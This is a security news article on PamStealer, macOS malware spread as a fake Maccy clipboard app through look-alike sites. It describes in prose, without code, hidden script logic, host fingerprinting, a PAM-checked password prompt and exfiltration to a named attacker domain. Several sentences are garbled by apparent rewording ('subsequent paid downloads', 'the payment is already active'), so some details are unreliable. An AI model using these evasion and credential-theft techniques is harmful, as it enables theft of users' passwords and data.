Cyber Security

PamStealer Uses Fake Macy Sites and PAM Checks to Steal Mac Passwords

Cybersecurity researchers have flagged a new macOS hack called Pam Stealer which uses a series of tactics to infect systems and siphon sensitive data.

The hack, discovered by Jamf Threat Labs, is distributed as a compiled AppleScript (.scpt) file masquerading as Maccy, an official open source clipboard manager. It was codenamed PamStealer due to its ability to verify the victim’s login password with macOS Pluggable Authentication (PAM) modules before capturing it.

The malware is delivered in two stages: an embedded AppleScript distributed within a disk image designed for download and a stage for subsequent paid downloads. The second artifact is a Rust-based infostealer capable of identity theft, browser data collection, persistence, and immersion.

The first access vector for the malware is a look-alike site (“maccyapp[.]com”) which emulates Maccy (“maccy[.]application”). The AppleScript (“Maccy.scpt”) contained within the disk image uses a self-contained JavaScript for Automation (JXA) loader that fetches and sets the payload classes using native Objective-C APIs.

What is noteworthy here is that the script, once launched in the Script editor, shows instructions to use it using the keyboard shortcut “⌘ + R” or by clicking the Run button from the Script Editor, which causes the malicious logic hidden in the file below a large block of empty lines to be executed.

“Notably, this works even if the file still contains the com.apple.quarantine attribute, which makes this approach attractive to attackers as Apple continues to strengthen Gatekeeper and Terminal,” said security researcher Thijs Xhaflaire. “Combined with a second layer based on Rust and a password capture workflow that authenticates credentials locally with PAM, the result is a quieter kill chain than we usually see from macOS hackers.”

The AppleScript dropper includes environment-aware features that allow execution to proceed only after fingerprinting the host and determining that it is running on Apple Silicon. It does this by obtaining a fingerprint-based key, which includes information such as CPU layout, location, keyboard layout, and time zone, and uses it to unlock an encrypted configuration containing the download URL and installation path.

On Intel-based Macs, the default decryption key is different and fails to determine the setting, resulting in dropper termination. The script also avoids executing within sandboxed or analysis environments, and the time zone systems, system location, and keyboard input that resolve to Eastern European countries, such as Russia, Belarus, Kazakhstan, Armenia, Azerbaijan, Kyrgyzstan, Moldova, Tajikistan, Uzbekistan, Turkmenistan, and Georgia.

Once the check is passed, the script accesses the external server and downloads the Mach-O binary written in Rust that pretends to be a Finder app and is responsible for harvesting data from web browsers, cryptocurrency wallet extensions, iCloud Keychain, and clipboard content. The captured information is then encrypted and exported to an infrastructure controlled by the attacker (“avenger-sync[.]live”) over an outgoing HTTP request.

Without forcing the user to grant full access to the file system, the thief provides a native password that collects the password of the victim’s system, and then verifies the entered password by checking it with the PAM API. If authentication fails, it prompts the user to re-enter the password, and repeats the loop until the correct password is provided.

“Once the password is captured, the thief displays a second, fake warning: ‘Maccy is damaged and cannot be opened. You should trash it,’ a close copy of the original Gatekeeper message,” Jamf said. “This is a trick. When it appears, the payment is already active, it captured the password and registered to persist, so the message only works to make the victim abandon the lure and think that the download is broken.”

Also built into the Rust binary is a small arm64 Mach-O that emulates macOS System Settings and is used to set persistence.

The development prompted Alex Rodionov, the developer of Maccy, to post a warning on their website and GitHub repository, saying, “Beware of fake websites impersonating Maccy. Malicious sites (like maccyapp[.]net and maccyapp[.]com) distributed malware disguised as Maccy. maccy.app is the only official website.”

“Together, these behaviors show how macOS thieves continue to evolve, using silent kill chains and traditional exploits that reduce the likelihood of traditional detection while maintaining compatibility with the standard features of macOS,” said Jamf.

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button